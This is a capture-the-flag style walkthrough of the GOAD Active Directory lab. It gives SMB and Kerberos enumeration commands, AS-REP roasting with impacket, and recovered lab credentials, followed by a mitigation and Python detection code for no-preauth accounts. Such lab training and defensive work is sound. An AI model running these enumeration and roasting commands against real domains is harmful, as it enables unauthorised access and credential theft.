Solving Game of Active Directory (GOAD) by Orange Cyberdefense Part-1
crackmapexec smb live_hosts
SMB signing is disabled, and SMBv1 is enabled, on some of the hosts.
Domains identified:
sevenkingdoms.local
essos.local
Enumerating SMB shares:
We found that guest access is allowed for the SMB share “all” on 192.168.56.22 (CASTELBLACK).
Upon checking this share we found it is empty, but we had write permissions on it.
smbclient //192.168.56.22/all -U "test"
Enumerating valid users from a list of potential users.
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/' | grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2)}}' > got_users.txt
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12
AS-REP Roasting
impacket-GetNPUsers north.sevenkingdoms.local/brandon.stark -no-pass
These credentials worked on three machines:
192.168.56.23 essos.local\brandon.stark:iseedeadpeople
192.168.56.22 north.sevenkingdoms.local\brandon.stark:iseedeadpeople
192.168.56.11 north.sevenkingdoms.local\brandon.stark:iseedeadpeople
Mitigation for AS-REP Roasting
Upon investigating the brandon.stark user, we came to know that this account has “Do not require Kerberos preauthentication” enabled.
Uncheck this option and run GetNPUsers.py again.
So, we just need to make sure this option is not enabled for any user.
When the Kerberos pre-authentication requirement is disabled, the KDC returns an AS-REP directly in response to the AS-REQ; when it is enabled, we get a “Preauth required” (KDC_ERR_PREAUTH_REQUIRED) error instead.
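Two defender-side checks that follow from this mitigation, written as an added example (this is not code from the original post or from the GOAD project): an audit of the userAccountControl attribute for the “do not require preauth” bit, so the setting can be verified across every account rather than one user at a time, and a simple detection over Windows Security event 4768 (Kerberos TGT requested) records, where a successful request with Pre-Authentication Type 0 is exactly the AS-REP-without-preauth condition described above. The account list and the 4768 events are constructed sample data; in practice they would come from an LDAP query and from the domain controllers' Security logs.

```python
"""Defender-side checks for the AS-REP roasting mitigation described above.

(1) audit userAccountControl for 'Do not require Kerberos preauthentication';
(2) flag 4768 events where a TGT was issued with no pre-authentication.
All sample data in this file is constructed for the example.
"""

# userAccountControl bits (Microsoft's UF_* flag values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample: the attributes an LDAP search for user objects would return.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "brandon.stark", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jon.snow", "userAccountControl": 0x10200},
    {"sAMAccountName": "legacy.svc", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]


def accounts_without_preauth(accounts, include_disabled=False):
    """Return sAMAccountNames whose UAC has the 'do not require preauth' bit set.

    Disabled accounts are skipped by default: they cannot be roasted, but they
    still deserve cleanup, so the caller may opt in to listing them too.
    """
    hits = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(acct["sAMAccountName"])
    return sorted(hits)


# Constructed sample 4768 events, field names as in the Security log event XML.
# PreAuthType 0 = no pre-authentication; TicketEncryptionType 0x17 = RC4-HMAC,
# 0x12 = AES256-CTS-HMAC-SHA1-96; Status 0x0 = success, 0x6 = client not found.
SAMPLE_4768 = [
    {"TargetUserName": "brandon.stark", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "::ffff:192.168.56.50"},
    {"TargetUserName": "jon.snow", "PreAuthType": "2", "TicketEncryptionType": "0x12",
     "Status": "0x0", "IpAddress": "::ffff:192.168.56.31"},
    {"TargetUserName": "nonexistent", "PreAuthType": "0", "TicketEncryptionType": "0x0",
     "Status": "0x6", "IpAddress": "::ffff:192.168.56.50"},
]


def asrep_without_preauth(events):
    """Return (user, source_ip, is_rc4) for each successful TGT issued with no pre-auth.

    A successful 4768 with PreAuthType 0 means the KDC handed an AS-REP to a
    requester that never proved knowledge of the password, which is the
    condition the mitigation above removes. Failed requests are ignored.
    """
    findings = []
    for ev in events:
        if ev["PreAuthType"] != "0" or int(ev["Status"], 16) != 0:
            continue
        rc4 = int(ev["TicketEncryptionType"], 16) == 0x17
        findings.append((ev["TargetUserName"], ev["IpAddress"], rc4))
    return findings


if __name__ == "__main__":
    print("Accounts with preauth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("Including disabled accounts:", accounts_without_preauth(SAMPLE_ACCOUNTS, include_disabled=True))
    for user, ip, rc4 in asrep_without_preauth(SAMPLE_4768):
        print(f"AS-REP issued without preauth: {user} from {ip} (RC4={rc4})")
```

The audit is the preventive half: any account it lists should have the option unchecked, as done for brandon.stark above. The 4768 check is the detective half, and the RC4 flag is worth surfacing separately because an RC4-encrypted reply is the cheapest one for an attacker to attack offline.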
Thanks for reading!